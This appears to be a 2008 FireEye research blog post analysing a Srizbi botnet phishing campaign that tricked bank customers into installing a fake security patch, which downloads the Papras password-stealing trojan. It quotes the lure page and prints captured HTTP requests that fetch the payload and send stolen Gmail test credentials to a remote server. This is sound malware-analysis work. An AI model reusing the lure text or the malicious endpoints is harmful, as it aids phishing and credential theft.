Yesterday, we reported that we saw Srizbi sending spam to specifically target Capital One (http://www.capitalone.com) and BankNorth (http://www.tdbanknorth.com/) customers:

http://blog.fireeye.com/research/2008/08/srizbi-phishes.html#more

These spam emails instructed users to install security patches which were actually malicious binaries that had names like "Setup_CapitalOne_clientno4508832.exe" and "TDBankNorthDigicertx_509.exe".

As a refresher, the Capital One "update" page looked like this:

-----------------------------

Capital One Bank users should install the patch per the instructions below to address this security vulnerability that aims to cause buffer overflow that could provide the potential for an attacker to run arbitrary or malicious code on a user’s PC.

Download Update:

For Windows XP, Windows 2000, Windows 98, Windows ME:

Please click here to install the update.
Please click here to upgrade your account signature.

For Windows Vista:
Please click here to go to download Windows Vista Update.
1. Click the file links to download the file from the Web page.
2. When prompted, select a drive and directory in which to save the
downloaded file.
3. Double-click the Setup_CapitalOne_clientno4508832.exe icon. You may see a dialog stating "A program needs your permission to continue". If you see this dialog, click Continue.

Note: Point to note here, it’s giving separate installation instruction for Vista Users. This new binary looks compatible with Windows Vista too.

-----------------------------

Detailed analysis of Setup_CapitalOne_clientno4508832.exe (md5: 33BEBF35532D00A71F883FBB0621401F) uncovered that this binary is a downloader which further installs a password/credit card stealer called Trojan.Papras (cb_4.exe - md5: 06E589B4E3AB93C6B16389DD79549A7A) onto the user’s system.

GET /cb_4.exe HTTP/1.1
Accept: */* Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: spacestorminc.com Connection: Keep-Alive

This Trojan includes a keylogger as well as predefined routines that search for cached credentials for ICQ, IMAP, POP3, FTP and related protocols. It also has a mechanism to read previously stored logins as well as live information in web forms (for instance, a credit card number)

As cb_4.exe runs, it installs a kernel mode driver named "new_drv.sys". It also shuts down the following Windows services:

Application Layer Gateway Service
Workstation Service
Windows Firewall/Internet Connection Sharing.

It further starts generating outbound HTTP communication to a remote server to activate its password stealing component. We launched Gmail on the infected PC and entered fake account information. Here is the outbound communication as we clicked the "Sign in" button.

GET /cgi-bin/cmd.cgi?user_id=22141119241&version_id=112&passphrase=fkj123dvlksd412lsd&socks=10698&version=115&crc=00000000 HTTP/1.1
Accept: */* Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 91.203.92.81
Connection: Keep-Alive

e="upload_file"; filename="2121124124.252" Content-Type: application/octet-stream URL: https://www.google.com/accounts/ServiceLoginAuth?service=mail ltmpl=default<mplcache=2&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3F&service=mail&rm=false<mpl=default<mpl=default&Email=iloveu@gmail.com&Passwd=hello&rmShown=1&signIn=Sign+in&asts=
----------------------------10c34321c32110c349--

Where the login credentials as entered were:
Email: iloveu@gmail.com
Password: hello

Email passwords are just one vector by which this Trojan will steal information. As mentioned, it looked in all web input forms and had templates for many IM and file protocols. It is clear that this information is being stolen to perform identity theft.

This recent campaign by Srizbi is showing that these Bot herders have shifted from trying to make money by spamming into the information/identity theft space. That is not to say they will stop spamming your inbox, it's simply to say that they have enhanced the capabilities of their Bots.

In the past week we and other researches have shown a direct connection between Srizbi, Rustock, Pushdo, Mega-D, etc via Trojan.Exchanger:

http://blog.fireeye.com/research/2008/08/srizbi-and-ru-1.htm
http://blog.fireeye.com/research/2008/08/srizbi-and-rust.html
http://www.darkreading.com/document.asp?doc_id=162056&WT.svl=news2_1
http://www.marshal.com/trace/traceitem.asp?article=751

And now, we see a direct connection between Trojan.Papras and Srizbi. This paradigm shift from the relatively innocuous payload of spam to the identify theft realm is unsettling, given the hundreds of thousands of computers that are alreadyed 0wned by these Botnets. It has been said right along that although these Bots are currently only spamming, they have the capability to add features to perform actions like UDP DoS or packet sniffing or even to take pictures with your webcam. Today we saw this theory manifest itself into reality first hand.

Atif Mushtaq @ FireEye Malware Intelligence Labs